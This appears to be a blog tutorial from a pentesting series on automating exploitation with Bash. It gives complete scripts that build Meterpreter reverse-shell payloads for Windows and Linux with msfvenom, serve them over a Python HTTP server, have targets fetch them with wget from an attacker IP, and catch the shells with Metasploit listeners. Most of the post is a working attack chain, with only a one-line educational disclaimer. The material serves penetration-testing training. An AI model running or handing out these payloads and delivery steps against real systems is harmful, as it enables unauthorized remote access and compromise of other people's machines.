Objective: Create and deliver payloads using Bash scripts to automate exploitation tasks in pentesting.
Important Notice
This post is for educational purposes only. Unauthorized use of these techniques may be illegal and is strictly prohibited. Always obtain proper authorization before conducting any penetration testing activities.
Diving into Exploitation with Bash Scripting
Welcome back to our series, "Pentesting - Scripting with Bash." In our last post, we automated the reconnaissance phase of pentesting, gathering valuable information about targets. Today, we’ll move into exploitation and payload delivery, a critical phase in pentesting where we use the information gathered to exploit vulnerabilities and gain access to target systems.
Understanding Exploitation
Exploitation involves taking advantage of vulnerabilities in a system to execute arbitrary code, gain unauthorized access, or perform other malicious activities. This phase often requires creating and delivering payloads that can be executed on the target system.
Why Automate Exploitation?
Automating exploitation tasks can save time, ensure consistency, and reduce the likelihood of errors. Using Bash scripts, you can automate the generation and delivery of payloads, making your exploitation process more efficient and repeatable.
Prerequisites
Before we begin, ensure you have the necessary tools installed:
Metasploit Framework: Required for
msfvenom
to generate payloads.#Ubuntu sudo apt update sudo apt install snapd sudo snap install metasploit-framework
Python 3: Required to run a simple HTTP server for payload delivery.
sudo apt install python3
Generating Payloads
One of the most common tools for generating payloads is msfvenom
, which is part of the Metasploit Framework. It allows you to create various types of payloads for different platforms.
Example: Generating reverse shell payloads for both Windows and Linux using msfvenom
.
#!/bin/bash
# Generate reverse shell payloads for Windows and Linux
read -p "Enter the LHOST (local host IP): " lhost
read -p "Enter the LPORT (local port): " lport
windows_payload="reverse_shell.exe"
linux_payload="reverse_shell.elf"
# Generate Windows reverse shell payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f exe -o $windows_payload
echo "Windows payload generated: $windows_payload"
# Generate Linux reverse shell payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f elf -o $linux_payload
echo "Linux payload generated: $linux_payload"
Save this script as generate_
payloads.sh
, make it executable, and run it:
chmod +x generate_payloads.sh
./generate_payloads.sh
This script generates reverse shell payloads for both Windows and Linux using msfvenom
.
Explanation:
Windows Payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f exe -o $windows_payload
Generates a Windows Meterpreter reverse TCP payload.
Formats it as an executable file (
-f exe
).Saves it to the specified output file.
Linux Payload:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f elf -o $linux_payload
Generates a Linux Meterpreter reverse TCP payload.
Formats it as an ELF file (
-f elf
).Saves it to the specified output file.
Delivering Payloads
Once the payloads are generated, you need to deliver them to the target. This can be done through various methods, such as exploiting vulnerabilities in web applications or using social engineering techniques.
Example: Delivering payloads via a simple HTTP server.
#!/bin/bash
# Start a simple HTTP server to deliver the payloads
read -p "Enter the directory containing the payloads: " payload_dir
cd $payload_dir
echo "Starting HTTP server to deliver payloads..."
python3 -m http.server 8080
Save this script as deliver_
payloads.sh
, make it executable, and run it:
chmod +x deliver_payloads.sh
./deliver_payloads.sh
This script starts a simple HTTP server using Python to deliver the payloads.
Explanation:
python3 -m http.server 8080
: This command starts an HTTP server on port 8080, serving files from the current directory. This allows you to easily share the payloads with the target by providing them with a URL to download.
Combining Payload Generation and Delivery
Let's create a comprehensive script that automates both payload generation and delivery for both Windows and Linux targets.
Create a new script file named
exploit.sh
.touch exploit.sh
Open the file in a text editor and add the following code:
#!/bin/bash # Generate and deliver payloads for Windows and Linux # Function to generate payloads generate_payloads() { read -p "Enter the LHOST (local host IP): " lhost read -p "Enter the LPORT (local port): " lport windows_payload="reverse_shell.exe" linux_payload="reverse_shell.elf" # Generate Windows reverse shell payload msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f exe -o $windows_payload echo "Windows payload generated: $windows_payload" # Generate Linux reverse shell payload msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f elf -o $linux_payload echo "Linux payload generated: $linux_payload" } # Function to deliver payloads deliver_payloads() { read -p "Enter the directory containing the payloads: " payload_dir cd $payload_dir echo "Starting HTTP server to deliver payloads..." python3 -m http.server 8080 } # Main function main() { generate_payloads deliver_payloads } main
Save the file and make it executable:
chmod +x exploit.sh
Run the script:
./exploit.sh
This script automates the entire process of generating and delivering payloads for both Windows and Linux targets. It prompts for necessary input, generates the payloads using msfvenom
, and starts a Python HTTP server to deliver the payloads.
Explanation:
generate_payloads Function:
Prompts for LHOST and LPORT.
Generates reverse shell payloads for Windows and Linux using
msfvenom
.
deliver_payloads Function:
Prompts for the directory containing the payloads.
Starts a simple HTTP server using Python to deliver the payloads.
main Function:
- Calls the
generate_payloads
anddeliver_payloads
functions to automate the entire process.
- Calls the
How to Use the Script
Run the Script:
- Execute the script by running
./
exploit.sh
.
- Execute the script by running
Input LHOST and LPORT:
- When prompted, enter the local host IP (LHOST) and the local port (LPORT) that the reverse shells should connect to.
Specify Payload Directory:
- When prompted, enter the directory where the payloads should be stored. This is also where the HTTP server will be started to serve the payloads.
Download the Payloads:
On the target machine, use a web browser or a command-line tool like
wget
orcurl
to download the payloads from the HTTP server. For example:wget http://<attacker-ip>:8080/reverse_shell.exe wget http://<attacker-ip>:8080/reverse_shell.elf
Setting Up a Listener
Before executing the payloads, you need to set up a listener on your local machine to catch the reverse shell connections. You can use Metasploit for this purpose.
Start Metasploit:
msfconsole
Set Up a Multi-Handler for Windows:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST <your local IP> set LPORT <your local port> exploit
Set Up a Multi-Handler for Linux:
Open a new Metasploit console tab or window, and set up a listener for Linux:
msfconsole use exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set LHOST <your local IP> set LPORT <your local port> exploit
This will start listeners on your specified LHOST and LPORT for both Windows and Linux payloads. Once the payloads are executed on the target machines, you should see Meterpreter sessions open, giving you remote access to the target systems.
Explanation:
Metasploit Console (
msfconsole
): Starts the Metasploit Framework console.Multi-Handler: A generic payload handler for various types of payloads.
Setting LHOST and LPORT: Configures the handler to listen on the specified local IP and port.
Exploit: Starts the listener and waits for incoming connections.
Execute the Payloads:
Run the downloaded payloads on the target machines. This will establish reverse shell connections back to your specified LHOST and LPORT.
For Windows, double-click the
reverse_shell.exe
file to execute it.For Linux, navigate to the directory containing the
reverse_shell.elf
file and run:chmod +x reverse_shell.elf ./reverse_shell.elf
Conclusion
In this eighth post, we've learned how to automate the exploitation and payload delivery phase of pentesting using Bash scripts. By generating and delivering payloads automatically, you can streamline your exploitation tasks, save time, and ensure consistency. We've also covered how to set up a listener to catch the reverse shell connections once the payloads are executed.
In the next post, we'll explore post-exploitation tasks and how to automate them to maintain access and extract valuable information from compromised systems. Stay tuned, and happy scripting!